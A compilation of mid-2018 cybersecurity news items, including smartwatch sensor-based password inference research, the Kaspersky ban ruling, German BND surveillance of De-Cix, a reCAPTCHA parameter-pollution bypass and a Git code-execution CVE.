We found that extracting data from traffic likely to correspond to a password or other sensitive information (name, surname, email address) is a fairly straightforward task. Applying the full power of available recognition algorithms to these data on a PC or in cloud services, attackers, as shown earlier, can subsequently recover this sensitive information from accelerometer and gyroscope signal logs. Moreover, the accumulation of these signals over an extended period facilitates the tracking of user movements — and that’s without geoinformation services (such as GPS/GLONASS, or base station signals).

We established that the use of simple methods of analyzing signals from embedded sensors such as accelerometers and gyroscopes makes it possible (even with the computing power of a wearable device) to determine the moments when one and the same text is entered (for example, authentication data) to an accuracy of up to 96% for desktop computers and up to 64% for mobile devices. The latter accuracy could be improved by writing more complex algorithms for processing the signals received, but we intentionally applied the most basic mathematical toolbox. Considering that we viewed this experiment through the prism of the threat to corporate users, the results obtained for the desktop computer are a major cause for concern.

A probable scenario involving the use of wearable devices relates to downloading a legitimate app to a smartwatch — for example, a fitness tracker that periodically sends data packets of several dozen kilobytes in size to a server (for example, the uncompressed “signal signature” for the 13-character password was about 48 kilobytes).

Since the apps themselves are legitimate, we assume that, alongside our Android Wear/Android for Smartwatch test case, this scenario can be applied to Apple smartwatches, too.

There are several indications that an app downloaded onto a smartwatch might not be safe.

If, for instance, the app sends a request for data about the user’s account (the GET_ACCOUNTS permission in Android), this is cause for concern, since cybercriminals need to match the “digital fingerprint” with its owner. However, the app can also allow the user to register by providing an email address — but in this case you are at least free to enter an address different to that of the Google Play account to which your bank card is linked.
If the app additionally requests permission to send geolocation data, your suspicions should be aroused even further. The obvious advice in this situation is not to give additional permissions to fitness trackers that you download onto your smartwatch, and to specify a company email address at the time of registration.
A short battery life can also be a serious cause for concern. If your gadget discharges in just a few hours, this is a sign that you may be under observation. Theoretically, a smartwatch can store logs of your activity with length up to dozens of hours and upload this data later.
In general, we recommend keeping a close eye on smartwatches sported by employees at your office, and perhaps regulating their use in the company’s security policies. We plan to continue our research into cyberphysical systems such as wearable smart gadgets, and the additional risks of using them.

PE Firm Thoma Bravo Buys Majority Stake in LogRhythm
1.6.2018 securityweek IT

Private equity firm Thoma Bravo announced on Thursday that it will acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm.

Terms of the deal, which is expected to close in Q3 2018, were not disclosed.

Founded in 2003, LogRhythm is veteran security firm that has raised more than $110 Million in funding, and has more than 2,500 customers around the world that use its platform that combines traditional SIEM capabilities with user and entity behavior analytics (UEBA).

“Thoma Bravo has long admired the work of Andy, Chris, Phil Villella and the entire LogRhythm team,” said Seth Boro, a managing partner at Thoma Bravo. “The company’s impressive track record of growth shows the continued demand for LogRhythm’s differentiated offerings. With Thoma Bravo’s investment, we look to further accelerate product innovation and drive continued customer success.”

Thoma Bravo has made several large investments in the cybersecurity space over the years. Its portfolio of investments include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.

ProtonMail Launches VPN Application for macOS
1.6.2018 securityweek Apple

Encrypted email service provider ProtonMail on Wednesday announced the availability of a virtual private network (VPN) service for macOS users.

Initially introduced for some of its paid ProtonMail users in early 2017, the VPN service saw a wider launch on Windows last year, and also arrived on Android in January 2018. Last year, the CERN-founded company also launched a Tor hidden service and an encrypted contacts manager.

Following a beta testing period, the Swiss-based service provider is now making the VPN application available for all macOS users, allowing them to easily protect their Internet connections. Users who already have a ProtonVPN or ProtonMail account only need to download the application, log in, and start using it immediately.

Developed by the same team behind ProtonMail, the VPN service takes advantage of technologies such as Secure Core and Tor integration and is available for free with no ads. Furthermore, the company claims that users can enjoy it without worrying about malware or monetization of user data.

“With our VPN for Mac application, it is now extremely simple to switch countries, create custom profiles, connect to the Tor network, and route your traffic through our Secure Core servers. Not to mention all the essential perks of ProtonVPN, like hiding your IP address, defending against cyber-attacks, and unblocking censored content,” ProtonMail says.

Users opting for the free plan get unlimited bandwidth and access to servers in three continents. Upgrade options are available for those looking to gain access to more servers and extra features.

Many members of the ProtonMail community have requested the macOS app, the company says. Over the past months, the service provider has worked closely with over ten thousand beta testers to address bugs in the application and ensure it is not only easy to use, but also visually appealing.

The macOS app also takes advantage of the modern IKEv2 protocol for higher performance, providing users with a faster and more stable connection (it promises speeds of more than 300 Mbps, under the right conditions).

Users will be able to easily connect to any country with a single click, to choose from the available Secure Core servers, Tor servers, and P2P servers, and to create and save custom connection profiles. A VPN kill switch is also available, designed to cut the Internet if the connection to the VPN drops, thus preventing data from leaking when the VPN is not connected.

“More people are starting to wake up to the fact that privacy matters, and it is important to make tools like VPN widely accessible, especially for the over 1.5 billion people around the world who live under Internet surveillance and censorship,” Dr. Andy Yen, CEO of ProtonMail, said in a statement.

German Spy Agency Can Keep Tabs on Internet Hubs: Court
1.6.2018 securityweek  BigBrothers

Germany's spy agency can monitor major internet hubs if Berlin deems it necessary for strategic security interests, a federal court has ruled.

In a ruling late on Wednesday, the Federal Administrative Court threw out a challenge by the world's largest internet hub, the De-Cix exchange, against the tapping of its data flows by the BND foreign intelligence service.

The operator had argued the agency was breaking the law by capturing German domestic communications along with international data.

However, the court in the eastern city of Leipzig ruled that internet hubs "can be required by the federal interior ministry to assist with strategic communications surveillance by the BND".

De-Cix says its Frankfurt hub is the world's biggest internet exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, which handles more than six terabytes per second at peak traffic.

De-Cix Management GmbH, which is owned by eco Association, the European internet industry body, had filed suit against the interior ministry, which oversees the BND and its strategic signals intelligence.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

The surveillance sifts through digital communications such as emails using certain search terms, which are then reviewed based on relevance.

De-Cix said in a statement Thursday that it believed the ruling shielded it from criminal liability for violations of the law protecting German domestic communications against tapping by stating that the German government bore responsibility.

However it said it would review whether it would take its complaint to the Federal Constitutional Court.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

Germany had reacted with outrage when information leaked by former NSA contractor Edward Snowden revealed in 2013 that US agents were carrying out widespread tapping worldwide, including of Chancellor Angela Merkel's mobile phone.

Merkel, who grew up in communist East Germany where state spying on citizens was rampant, declared repeatedly that "spying among friends is not on" while acknowledging Germany's reliance on the US in security matters.

But to the great embarrassment of Germany, it later emerged that the BND helped the NSA spy on European allies.

Berlin in 2016 approved new measures, including greater oversight, to rein in the BND following the scandal.

Yes, Germany BND foreign intelligence service can spy on the world’s biggest internet exchange

1.6.2018 securityaffairs BigBrothers

This week, a federal court has ruled that Germany’s BND foreign intelligence service can monitor major internet hubs for strategic security interests.
Recently, the operator of the world’s top Internet Hub sued the BND foreign intelligence service for the surveillance activity conducted by the spy agency.

The operator wants to be sure that the agency is not violating any law by monitoring German domestic communications as well as tapping international traffic through the De-Cix exchange.

The De-Cix exchange is the world’s biggest internet exchange based in Frankfurt and represents a privileged position for traffic monitoring,

The hub sees more than six terabytes per second at peak traffic from China, Russia, the Middle East and Africa.

The Federal court of Leipzig ruled that internet hubs “can be required by the federal interior ministry to assist with strategic communications surveillance by the BND”.

The hub is operated by the De-Cix Management GmbH, which is owned by the European internet industry organization eco Association.

The European eco Associationh body filed suit against Germany’s interior ministry against its surveillance activities.

“We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner.” states the body.

The mutual support of the US NSA intelligence agency and the BND was largely documented in the past.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. At the time, the cyberspies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the UE.

In August 2015, the German weekly Die Zeit disclosed documents that reveal how the German Intelligence did a deal with the NSA to get the access to the surveillance platform XKeyscore.

Internal documents reported that Germany’s domestic intelligence agency, the Federal Office for the Protection of the Constitution (BfV), received the software program XKeyscore from the NSA in return of data from Germany.

Back in 2o11, the NSA demonstrated the capabilities of the XKeyscore platform of the BfV agency. After two years of negotiation, the BfV signed an agreement to receive the NSA spyware software and install it for analyzing metadata collected on German citizens. In return, the German Agency promised to share metadata collected.

The NSA tool collects ‘nearly everything a user does on the internet’, XKeyscore gives ‘widest-reaching’ collection of online data analyzing the content of emails, social media, and browsing history.

In 2013, documents leaked by Edward Snowden explained that a tool named DNI Presenter allows the NSA to read the content of stored emails and it also enables the intelligence analysts to track the user’s activities on Facebook through a system dubbed XKeyscore.

XKeyscore map used also by BND

According to Die Zeit, the document “Terms of Reference” stated: “The BfV will: To the maximum extent possible share all data relevant to NSA’s mission”.

In June 2016, the German government approved new measures to rein in the activities of BND agency after its scandalous support to NSA surveillance activity.

US Federal court judge rejected a lawsuit by Kaspersky against the ban on its products
1.6.2018 securityaffairs BigBrothers

A US Federal court judge, Colleen Kollar-Kotelly, rejected a lawsuit by Russian cybersecurity firm Kaspersky Lab against the ban on the use it solution by government agencies
On Wednesday, the US Federal court judge Colleen Kollar-Kotelly rejected a lawsuit by Russian cyber security firm Kaspersky Lab against the ban on the use it solution by government agencies.

The ban on security firm Kaspersky imposed by the US Department of Homeland security started in September 2017.

In December, Kaspersky Lab sued the U.S. Government over product ban, it’s appeal was filed in the U.S. District Court for the District of Columbia, just a week after the US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by security giant, the ban will start from October 1, 2018.

Below the details of the ban included in the section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

US officials believe Russian intelligence could use the Kaspersky software to spy on the systems running it.

Back to the present, Federal court judge Colleen Kollar-Kotelly rejected the lawsuit, reaffirming the right of the government to choose its providers to protect the security of its infrastructure.

The ban “does not inflict ‘punishment’ on Kaspersky Lab,” Kollar-Kotelly said in her ruling.

“It eliminates a perceived risk to the nation’s cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation,” said Kollar-Kotelly.


The judge rejected Kaspersky’s complaint that US Government had illegally denied the firm’s “right” to sell a product, she also remarked that the ban is legal and will remain in place.

The impact on Kaspersky was severe, other governments expressed their concerns over the possibility to hack their solutions as part of cyber espionage campaigns.

Many companies in the US already stopped using Kaspersky software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.

North Korea-linked Andariel APT Group exploited an ActiveX Zero-Day in recent attacks
1.6.2018 securityaffairs APT

A North Korea-linked APT group, tracked as Andariel Group, leveraged an ActiveX zero-day vulnerability in targeted attacks against South Korean entities.
According to a report published by South Korean cyber-security firm AhnLab, the Andariel Group is a division of the dreaded Lazarus APT Group, it already exploited ActiveX vulnerabilities in past attacks

The attackers exploited at least nine separate ActiveX vulnerabilities, including a new zero-day flaw, in a wave of watering hole attacks aimed to infect visitors of compromised websites with a backdoor trojan.

The zero-day vulnerability seems to be connected to a series of attacks against Samsung SDS Acube installations.

Acube is an application developed by Samsung’s enterprise division widely used in South Korean enterprises that supports ActiveX controls to implement interactive features.

“According to the security industry, from late last month until this month, attacks against North Korean research institutes and websites have been spotlighted.” reported the local media DDaily.

“The attacker, who is believed to be carrying the Andaleri Group, exploited about 9 ActiveX vulnerabilities, including Samsung SDS “eCube”, and tried to collect information through a water ring attack.”

The malicious code was used to control the infected systems and gather intelligence.

“The zero-day vulnerability has been found in this attack, but it is unclear whether the attacker actually used it,” said a government official from the Korea Internet & Security Agency (KISA).

Simon Choi
Operation GoldenAxe. North Korea's cyber attack only on South Korea (using ActiveX vuln) from 2007 to 2018.

10:28 AM - May 29, 2018
30 people are talking about this
Twitter Ads info and privacy
Samsung addressed the Acube zero-day flaw with the release of an update, while South Korea’s CERT team has issued a security advisory for the zero-day issue.

North Korea-linked APT groups are among the most active threat actors, recently the US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra, the Brambul and Joanap.

Senators Ask National Security Advisor to Save Cybersecurity Coordinator Role
31.5.2018 securityweek BigBrothers

A group of Democrat senators is urging National Security Advisor John Bolton to reconsider the decision to eliminate the role of cybersecurity coordinator, arguing that it represents a step in the wrong direction.

Bolton announced the decision to cut the cybersecurity role following the departure of Rob Joyce. The National Security Council (NSC) said the move was part of an effort to streamline authority, noting that the duties of the cybersecurity coordinator would be taken over by two other senior directors.

“Streamlining management will improve efficiency, reduce bureaucracy and increase accountability,” the NSC said at the time.

Cybersecurity experts and several lawmakers contested the decision after it was announced. On Wednesday, Senator Amy Klobuchar and 18 other senators sent a letter to Bolton urging him to reconsider his recommendation, citing increasingly frequent and sophisticated cyber operations, particularly ones believed to have been launched by Russia.

“Our country’s cybersecurity should be a top priority; therefore, it is critically important that the U.S. government present a unified front in defending against cyberattacks,” the senators wrote. “Eliminating the Cybersecurity Coordinator role keeps us from presenting that unified front and does nothing to deter our enemies from attacking us again. Instead, it would represent a step in the wrong direction.”

While there are a few private-sector cybersecurity professionals who applaud the decision, many believe eliminating the role is a big mistake.

“The removal of the cybersecurity position will leave the Trump administration flat footed the next time a major cyber event does happen. In situations where minutes matter, the most prepared person in the room almost always carries the day. In a room full of decision makers with no cyber security background and a general who is in charge of fighting cyber wars, it is a foregone conclusion as to whom will have the strongest voice in the room,” Ross Rustici, senior director of intelligence services at Cybereason, told SecurityWeek.

“Every cyber event will become a military issue with a military solution. Regardless of the efficacy of the position or those who occupied it, the fact that the position existed demonstrated a commitment to understanding, managing, and responding to cyber threats in a way that was on par with the other major global issues of the day. The absorption of that position into someone else’s duties makes cyber outside of the military context an ‘other duties as assigned’ mission. This will lead to a marginalization of the knowledge and strategy,” Rustici added.

HTTP Parameter Pollution Leads to reCAPTCHA Bypass
31.5.2018 securityweek Security

Earlier this year, a security researcher discovered that it was possible to bypass Google’s reCAPTCHA via HTTP parameter pollution.

The issue, application and cloud security expert Andres Riancho says, can be exploited when a web application crafts the request to /recaptcha/api/siteverify in an insecure way. Exploitation allows an attacker to bypass the protection every time.

When a web application using reCAPTCHA challenges the user, “Google provides an image set and uses JavaScript code to show them in the browser,” the researcher notes.

After solving the challenge, the user clicks verify, which triggers an HTTP request to the web application, which in turn verifies the user’s response with a request to Google’s reCAPTCHA API.

The application authenticates itself and sends a {reCAPTCHA-generated-hash} to the API to query the response. If the user solved the challenge correctly, the API sends an "OK" that the web application receives, processes, and most likely grants the user access to the requested resource.

Riancho discovered that an HTTP parameter pollution in the web application could be used to bypass reCAPTCHA (the requirement, however, reduced the severity of the vulnerability).

“HTTP parameter pollution is almost everywhere: client-side and server-side, and the associated risk depends greatly on the context. In some specific cases it could lead to huge data breach, but in most cases it is a low risk finding,” Riancho explains.

He notes that it was possible to send two HTTP requests to Google’s service and receive the same response. The reCAPTCHA API would always use the first secret parameter on the request but ignore the second, an issue the researcher was able to exploit.

Additionally, Google is providing web developers interested in testing their web applications with a hard-coded site and secret key to disable reCAPTCHA verification in staging environments and perform their testing, and the bypass leverages this functionality as well.

“If the application was vulnerable to HTTP parameter pollution AND the URL was constructed by appending the response parameter before the secret then an attacker was able to bypass the reCAPTCHA verification,” the researcher notes.

Two requirements should be met for the vulnerability to be exploitable: the web application needs to have an HTTP parameter pollution flaw in the reCAPTCHA URL creation, and to create the URL with the response parameter first, and then the secret. Overall, only around 3% of reCAPTCHA implementations would be vulnerable.

Riancho points out that Google addressed the issue in the REST API by returning an error when the HTTP request to /recaptcha/api/siteverify contains two parameters with the same name.

“Fixing it this way they are protecting the applications which are vulnerable to the HTTP Parameter Pollution and the reCAPTCHA bypass, without requiring them to apply any patches,” the researcher notes.

The issue was reported to Google on January 29, and a patch was released on March 25. The search giant paid the researcher $500 for the discovery.

U.S. Judge Rejects Kaspersky Suit Against Govt Ban on its Products
31.5.2018 securityweek BigBrothers

Washington - A Washington judge on Wednesday rejected a lawsuit by Russian computer security company Kaspersky Lab against the ban on use of its anti-virus software by government agencies.

Kaspersky had complained that the ban -- announced after officials said Russian intelligence was able to hack the software for espionage purposes -- was in effect a "punishment" of the company without it having given it any kind of hearing.

Federal court judge Colleen Kollar-Kotelly rejected the argument, saying the US government had the right to institute the ban to defend its computer security.

Related: The Increasing Effect of Geopolitics on Cybersecurity

The ban "does not inflict 'punishment' on Kaspersky Lab," Kollar-Kotelly said in her ruling.

"It eliminates a perceived risk to the nation's cybersecurity and, in so doing, has the secondary effect of foreclosing one small source of revenue for a large multinational corporation," she said.

She also rejected the global cybersecurity giant's complaint that it had been illegally denied the "right" to sell a product that is legal, and that the ban harmed its reputation.

While the company can still market its products, she said, the government has no obligation to buy them.

In addition, she said, as the ban is legal and will remain in place, nothing can be done about any harm to its reputation.

The ban began with a directive in September 2017 from the Department of Homeland Security for government agencies to remove Kaspersky software from their computing systems.

That has since been followed by a provision set by Congress in a budget bill prohibiting agencies from using Kaspersky software.

Both came after the National Security Agency, the US signals intelligence body, determined that Kaspersky software on an NSA employee's private computer allowed hackers, believed to be from Russian intelligence, to steal top secret NSA materials.

US officials have also expressed concern about alleged ties between Kaspersky and the Russian government, which the company denies.

The impact on the company has been heavy. Most US companies have moved to stop using its software, and most major stores have stopped selling it.

While the private company does not report its earnings, sales internationally have also reportedly been hurt.

Operator of World's Top Internet Hub Sues German Spy Agency
31.5.2018 securityweek BigBrothers

Berlin - The operator of the world's largest internet hub challenged the legality of sweeping telecoms surveillance by Germany's spy agency, a German court heard Wednesday.

The BND foreign intelligence service has long tapped international data flows through the De-Cix exchange based in the German city of Frankfurt.

But the operator argues the agency is breaking the law by also capturing German domestic communications.

"We have grave doubts about the legality of the current practice," said a statement Wednesday on the website of De-Cix Management GmbH, which is owned by European internet industry body the eco association.

"We consider ourselves under obligation to our customers to work towards a situation in which strategic surveillance of their telecommunications only takes place in a legal manner."

Its lawyer Sven-Erik Heun told German news agency DPA that "the BND has chosen the biggest pond to go fishing in".

De-Cix Management launched its suit against the German interior ministry, which oversees the BND and its strategic signals intelligence.

"With the lawsuit, we seek judicial clarification and, in particular, legal certainty for our customers and our company," the company said.

The federal administrative court in the eastern city of Leipzig was not certain to make a ruling on Wednesday.

Given the mass of daily phone calls, emails, chats, internet searches, streamed videos and other online communications, an effective fire-walling of purely German communications is unrealistic, activists argue.

The De-Cix operator says its Frankfurt hub is the world's biggest Internet Exchange, bundling data flows from as far as China, Russia, the Middle East and Africa, and handles more than 6 terabits per second at peak traffic.

The De-Cix, with 20 data centres, uses more electricity than Frankfurt international airport, the Sueddeutsche Zeitung daily reported this week.

It said the BND, a partner of the US National Security Agency (NSA), has placed so-called Y-piece prisms into its data-carrying fibre optic cables that give it an unfiltered and complete copy of the data flow.

Tens of Vulnerabilities Found in Pentagon Travel Management System
31.5.2018 securityweek 

HackerOne announced on Wednesday the results of “Hack the DTS,” the fifth bug bounty program run by the U.S. Department of Defense (DOD).

The DTS (Defense Travel System) is a fully integrated and automated travel management system created specially for the DOD. The platform is said to be accessed by roughly 100,000 unique users every day, including for creating authorizations, receiving approvals, preparing reservations, and generating travel vouchers.

The Pentagon wanted to test the security of the platform and selected 19 vetted hackers from HackerOne to complete the task. Researchers, mainly from the United States and the United Kingdom, submitted more than 100 vulnerability reports, 65 of which were classified as unique and valid, including 28 that described critical and high severity flaws.

White hat hackers earned a total of $78,650 for their findings, with the highest single payout, $5,000, paid out eight times.

“DTS is relied on by DoD travelers. More than 9,500 sites operate worldwide, and the security of these systems is mission-critical,” said Jack Messer, project lead at Defense Manpower Data Center (DMDC). “The ‘Hack the DTS’ challenge helped uncover vulnerabilities we wouldn’t have found otherwise, complementing the great work DMDC is already doing to protect critical enterprise systems and the people those systems serve.”

HackerOne pointed out that Hack the DTS was the second government bug bounty program that allowed participants to use social engineering.

The Pentagon has awarded researchers hundreds of thousands of dollars for finding thousands of vulnerabilities in its systems. The money was paid out through the Hack the Pentagon, Hack the Air Force, Hack the Army, and Hack the Air Force 2.0 bug bounty programs.

North Korea-Linked Group Stops Targeting U.S.
31.5.2018 securityweek BigBrothers

A threat actor linked to North Korea’s Lazarus Group has stopped targeting organizations in the United States, but remains active in Europe and East Asia.

The group, tracked by industrial cybersecurity firm Dragos as Covellite, has been known to target civilian electric energy organizations in an effort to collect intellectual property and information on industrial operations.

Unlike some of the other actors whose activities have been monitored by Dragos, Covellite does not currently have the capability to disrupt industrial control systems (ICS). However, the security firm does see it as a primary threat to the ICS industry.

Covellite’s campaigns have been aimed at organizations in Europe, East Asia and North America. One of the operations, conducted in September 2017, targeted U.S. electric companies and involved phishing emails and malicious Word documents designed to deliver a piece of malware.

FireEye analyzed those attacks and linked them to an actor affiliated with the North Korean government. The security firm published a report in October 2017 and noted that the actor appeared to lack the ability to disrupt power supply.

A blog post published by Dragos on Thursday does not mention North Korea, but researchers pointed out that Covellite’s infrastructure and malware are similar to ones associated with the group known as Lazarus and Hidden Cobra.

“Technical analysis of COVELLITE malware indicates an evolution from known LAZARUS toolkits. However, aside from technical overlap, it is not known how the capabilities and operations between COVELLITE and LAZARUS are related,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

According to Dragos, Covellite has been around since 2017 and is still active, but it has recently stopped targeting organizations in North America, while continuing to attack entities in Europe and East Asia.

“Given the group’s specific interest in infrastructure operations, rapidly improving capabilities, and history of aggressive targeting, Dragos considers this group a primary threat to the ICS industry,” said Caltagirone.

While Covellite may no longer be targeting organizations in the United States, that does not mean all North Korea-linked groups have done the same. Several cybersecurity firms told CyberScoop this week that North Korea has still launched attacks on businesses in the U.S.

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Fraud Protection Firm Signifyd Raises $100 Million
31.5.2018 securityweek  IT 

Signifyd, a San Jose, CA-based company that specializes in fraud protection solutions for e-commerce businesses, on Wednesday announced that it raised $100 million in a Series D funding round.

The round was led by Premji Invest, with participation from existing investors Bain Capital Ventures, Menlo Ventures, American Express Ventures, IA Ventures, Allegis Cyber and Resolute Ventures.

This brings the total raised by the company to date to $187 million, including $56 million secured in 2017 and $20 million in the previous year. Bloomberg reported that the company has been valued at roughly $400 million following the latest funding round.

Signifyd says it will use the funds to further accelerate its growth. The company claims the number of global e-commerce businesses it protects has doubled to more than 10,000. Signifyd customers include Build.com, Helly Hansen, iRobot, Walmart-owned Jet, Lacoste, Luxottica, Stance, Tous and Wayfair.

The company recently partnered with Magento, the open-source e-commerce platform, which Adobe agreed to buy for $1.68 billion.

Signifyd provides a solution that helps organizations identify fraudulent online orders by using a combination of machine learning, data science research and behavior technology. The solution should help reduce the risk of chargebacks and fraud without having a negative impact on customer experience.

Last month, the company opened its first European office in Barcelona, Spain.

“The fraud detection and prevention market is estimated to reach nearly $42 billion by 2022,” said Raj Ramanand, CEO and co-founder of Signifyd. “However, while fraud remains a serious concern, transactions wrongly declined due to suspected fraud represents a bigger problem of more than $150 billion a year. A wrong decline can push consumers to abandon the merchant and thereby erode customer lifetime value. With this funding, we’re looking to continue to enable friction-free e-commerce for enterprise and omnichannel retailers globally.”

The Current Limitations and Future Potential of AI in Cybersecurity
31.5.2018 securityweek  Cyber

A recent NIST study shows the current limitations and future potential of machine learning in cybersecurity.

Published Tuesday in the Proceedings of the National Academy of Sciences, the study focused on facial recognition and tested the accuracy of a group of 184 humans and the accuracy of four of the latest facial recognition algorithms. The humans comprised 87 trained professionals, 13 so-called 'super recognizers' (who simply have an exceptional natural ability), and a control group of 84 untrained individuals.

Reassuringly, the trained professionals performed significantly better than the untrained control groups. Surprisingly, however, neither human experts nor machine algorithms alone provided the most accurate results. The best performance came from combining a single expert with the best algorithm.

"Our data show that the best results come from a single facial examiner working with a single top-performing algorithm," commented NIST electronic engineer P. Jonathon Phillips. "While combining two human examiners does improve accuracy, it's not as good as combining one examiner and the best algorithm."

"The NIST study used a form of deep learning known as convolutional neural networks that has been proven effective for image recognition because it performs comparative analysis based on pixels rather than the entire image. This is like looking at the individual trees rather than the forest, to use a colloquialism," explains Chris Morales, head of security analytics at Vectra.

The question asked by the NIST researchers was how many humans or machines combined would lead to the lowest error rate of judgement when comparing two photos to determine if it they are of the same person -- with no errors being a perfect score. The outcome of their research was that combining man and machine produces a higher rate of accuracy for a single worker, which resulted in higher productivity. This result occurred because man and machine have different strengths and weaknesses that can be leveraged and mitigated by working together.

"What the researchers found," continued Morales, "was the best machine performed in the same range as the best humans. In addition, they found that combining a single facial examiner with machine learning yielded a perfect accuracy score of 1.0 (no errors). To achieve this same 1.0 accuracy level without machine learning required either four trained facial examiners or three super recognizers."

If these results are typical across the increasing use of artificial intelligence (AI) in cyber security -- and Morales believes the study is representative of the value of AI -- it implies we are rapidly approaching a tipping point. Right now, algorithms are not significantly better than trained professionals, but if used by a trained professional they can improve performance and reduce required manpower levels.

While AI itself is not new, it has grown dramatically in use and capability over just the last few years. "If we had done this study three years ago, the best computer algorithm's performance would have been comparable to an average untrained student," NIST's Phillips said. "Nowadays, state-of-the-art algorithms perform as well as a highly trained professional."

The implication is that we are not yet ready to rely solely on the decisions of machine learning algorithms, but that day is surely coming if algorithm quality continues to improve. We have, however, already reached the point where AI can decrease our reliance on human resources. The best results came not from team of experts combined with machine learning, but from a single professional working with the best algorithm.

"It is often the case that the optimum solution to a new problem is found with the combination of human and machine," comments Tim Sadler, CEO and co-founder of machine learning email security firm Tessian. "However, as more labelled data becomes available, and more researchers look into the problem, machine learning models generally become more accurate and autonomous reducing the need for a human 'operator'. A good example of this is medical imaging diagnosis where deep learning models now greatly outperform radiologists in the early diagnosis of cancerous tissues and will soon become the AI 'silver bullet'."

He doesn't believe that facial recognition algorithms have reached that stage yet.

"Facial recognition technology is fairly new, and although machine learning is quickly disrupting the industry clearly the technology is not perfect, for example there have been instances where facial recognition technology has authenticated through family likeness," Sadler said. "It will take years of close partnership between facial recognition experts are their machine learning counterparts working together, with the experts overriding the machine's mistakes and correctly labelling the data before a similar disruption is seen."

This NIST study is specifically about facial recognition -- but the basic principles are likely to be similar across all uses of machine learning in biometrics and cybersecurity. " First, the machine learning algorithm gathers facts about a situation through inputs and then compares this information to stored data and decides what the information signifies," explains Dr. Kevin Curran, senior IEEE member and professor of cybersecurity at Ulster University. "The computer runs through various possible actions and predicts which action will be most successful based on the collected information.

"AI is therefore increasingly playing a significant role in cybersecurity, especially as more challenges appear with authenticating users. However, these AI techniques must be adaptive and self-learning in complex and challenging scenarios where people have parts of their face obscured or the lighting is quite poor to preserve accuracy and a low false acceptance rate."

He cites the use of AI in Apple's Face ID. "Face ID works by projecting around 30,000 infrared dots on a face to produce a 3D mesh. This resultant facial recognition information is stored locally in a secure enclave on the new Apple A11 Bionic chip. The infra-red sensor on front is crucial for sensing depth. Earlier facial recognition features e.g. Samsung last year, were too easily fooled by face masks and 2D photos. Apple claim their Face ID will not succumb to these methods. However, some claim already that 3D printing someone's head may fool it, but we have yet to see that hack tested."

This NIST study was solely about the efficacy of facial recognition algorithms, and the results cannot be automatically applied to other machine learning algorithms. Nevertheless, the general conclusions are likely to apply across many other uses for AI in both physical security and cybersecurity. AI is improving rapidly. It cannot yet replace human expertise completely, but is most effective used in conjunction or by a single human expert. The implication is very clear: the correct combination of man and machine already has the potential to both improve performance and reduce payroll costs.

Miscreants hijacked the defunct SpamCannibal blacklist service
30.5.2018 securityaffairs

The SpamCannibal blacklist service was hijacked since Wednesday morning, attackers changed the DNS name server settings for the website overnight.
The SpamCannibal was born to blacklist IP address of malicious servers involved in spam campaigns and DoS attacks.

SpamCannibal was using a continually updated database containing the IP addresses of spam or DoS servers and blocks their ability to connect using services on a computer system that purposely delays incoming connections (aka TCP/IP tarpit).

The blacklist service was offline since last summer, but someone hijacked it on Wednesday morning, attackers changed the DNS name server settings for the website overnight.


The news was first reported by El Reg that was informed of the strange resurrection by a reader who told them that SpamCannibal was “pumping out Blacklist notifications for some of our servers and then when you go to spamcannibal.org, you get spam.”

“Visiting the site earlier today flung fake Adobe Flash updates at our sandboxed browser, downloads no doubt riddled with malware, so beware.” reads a blog post published by El Reg.

The DNS record for the blacklist service was changed to point at a rogue server controlled by attackers that likely used it to deliver malware and to alter the results of queries to the blacklist service.

Kevin Beaumont 🐈

If anybody uses spamcannibal's RBL, the domain has been taken over and has a wildcard response - so it returns everything as status spam. https://twitter.com/webme_it/status/1001731230264627202 …

12:51 PM - May 30, 2018
22 people are talking about this
Twitter Ads info and privacy
All the users that queried the service to check an IP address to see if it is blacklisted as a spam source received always a positive result with serious consequences.

The attackers set a wildcard domain so that any subdomain of spamcannibal.org returns an IP address, with this trick the domain was interpreted as blacklisted.
Researcher Martijn Grooten believes the attack wasn’t targeted.

“This really looks like a standard domain takeover by some dodgy parking service. Doesn’t appear particularly targeted to Spamcannibal,” Grooten concluded.

CVE-2018-11235 flaw in Git can lead to arbitrary code execution
30.5.2018 securityaffairs

The Git community disclosed a dangerous vulnerability in Git, tracked as CVE-2018-11235, that can lead to arbitrary code execution when a user operates in a malicious repository.
The Git developer team and other firms offering Git repository hosting services have issued security updates to address a remote code execution vulnerability, tracked as CVE-2018-11235 in the Git source code versioning software.

“In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.” reads the description provided by the Mitre organization.

